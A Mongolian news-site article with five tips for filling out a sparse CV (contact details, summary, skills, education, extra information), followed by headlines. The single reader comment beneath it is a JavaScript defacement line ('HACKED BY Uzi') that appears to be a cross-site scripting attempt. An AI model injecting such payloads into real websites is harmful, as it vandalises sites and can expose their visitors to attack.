Таны CV нэг л хоосон харагдаад байна уу?
2023, 10 сарын 23. 12:401

Магадгүй та шинэ төгсөгч, эсхүл нэг газраа л олон жил тогтвор суурьшилтай ажилласан нэгэн байж болох юм. Тиймдээ ч дараагийн ажлаа хайхад таны CV нэг л хоосон харагдаад байгаа юм биш биз? Тэгвэл бид танд энэ удаагийн нийтлэлээрээ CV-ээ хэрхэн дүүрэн харагдуулж бүрдүүлэх аргыг зааж өгье.

1. Холбоо барих мэдээллээ дэлгэрүүлэх

Ерөнхийлбөл, холбоо барих мэдээлэл дээр гар утасны дугаар, цахим шуудангийн хаяг байхад хангалттай байдаг. Гэхдээ бид энэ удаад CV-ээ илүү сайн дүүргэлттэй харагдуулах гэж байгаа шүү дээ. Тиймээс энэ нөхцөлд бид уг талбарт гар утасны дугаар, цахим шуудангийн хаягаас гадна оршин суугаа газрын хаяг, LinkedIn болон Twitter хаяг, гэрийн дугаарыг хавсаргаж болно.

2. CV-ийн товчийг оруулах

CV-ийн товч агуулга гэдэг хүний нөөцийн мэргэжилтэн таны CV-ийг үргэлжлүүлэн уншихад сэдэлжүүлэх цөөн өгүүлбэрийг хэлнэ. Үүнд та өөрийн хамгийн гарамгай эзэмшсэн ур чадварыг, боловсролын зэрэг, карьерын зорилготой хамт тусгах хэрэгтэй.

Жишээ нь:

“Үйлчилгээний салбарт ажил горилогч, хичээнгүй нэгэн ажил хайж байна. Өмнө нь үйлчилгээний салбарт бартендер, бохир хураагч, шугамын тогоочоор ажиллаж байсан туршлагатай. Хурдан хэмнэлтэй, стресстэй нөхцөлд өсөж хөгжин ажиллах чадвартай” г.м.

3. Ур чадвар дээрээ анхаарах

CV-ээс хүний нөөцийн мэргэжилтэн хамгийн их ач холбогдол өгч хардаг талбар бол ур чадварын хэсэг. Энэ хэсгээс хүний нөөцийн мэргэжилтнүүд дан ганц техникийн ур чадваруудыг хардаггүй бөгөөд таны зөөлөн ур чадварууд ч өндөр ач холбогдолтойг санаарай. Тиймээс CV дээрээ өөрийн ур чадваруудыг нэг бүрчлэн бичээрэй.

4. Эзэмшсэн боловсролоо дэлгэрэнгүй бичих

Та дээрх бүгдийг хийсэн ч CV тань нэг л дүүрч өгөхгүй бол эзэмшсэн боловсролынхоо тухай мэдээллийг илүү дэлгэрүүлж өгөөрэй. Энэ талбарт та өөрийн суралцсан сургууль, голч дүн, хамгаалсан зэргийг оруулж өгөхийн сацуу диплом хамгаалсан сэдэв болон бусад академик амжилтуудаа дурдаж болно.

5. Нэмэлт мэдээллийн талбарыг ашиглах

Энэ талбарт та өөрийн хийсэн сайн дурын ажил, гадаад хэлний мэдлэг, ажлаас гадуурх нийгмийн үйл ажиллагаанд хамрагддаг эсэх, хобби болон сонирхол, өөрийн бие даан ажиллаж буй төсөл, дадлага хаана хийсэн болоод авч байсан сертификат, шагналыг дэлгэрэнгүй дурдаж болно.


Танд амжилт хүсье!

Энэ мэдээнд өгөх таны сэтгэгдэл?
11
2
2
0
0
0
1
Сэтгэгдэл үлдээх
Нийт 1 сэтгэгдэл
Дөлгөөнбуян
202.70.34.27
   /
2023, 11 сарын 29. 12:23

document.body.innerHTML="body{visibility:hidden;}HACKED BY Uzi";

Онцлох мэдээ
Меta компанийн хувьцаа 2-р улирлын борлуулалтын таамаглалаас болж 10 гаруй хувиар унажээ
02024-4-26 12:12
Сансар огторгуйн гэрээний тухай тогтоолд ОХУ хориг тавьсныг АНУ шүүмжилжээ
02024-4-25 18:35
Газрын тосны үнэ өсжээ
02024-4-25 18:33
Нисэх онгоц тээгч “Жорж Вашингтон” хөлөг онгоц Япон руу хөдөлнө
02024-4-25 16:26
Чип суулгуулсан өвчтөн бодлоороо ханз үсэг бичиж чаджээ
02024-4-25 16:18
Хуванцрын бохирдолтой тэмцэх тухай гэрээний асуудлаарх уулзалт Канадад эхэлжээ
02024-4-25 16:09
Испанийн Ерөнхий сайд огцрох эсэхээ эргэцүүлнэ
02024-4-25 16:05
АНУ: 20 гаруй жилийн өмнөх гэмт хэргийн буруутан амьсгал хураахаасаа өмнө хэргээ хүлээжээ
02024-4-25 16:01
Билли Айлиш: Би бүх л амьдралынхаа туршид охидод хайртай байсан
12024-4-25 13:01
Oracle компани төв оффисоо Техас мужаас Теннесси муж руу нүүлгэн болжээ
02024-4-25 12:35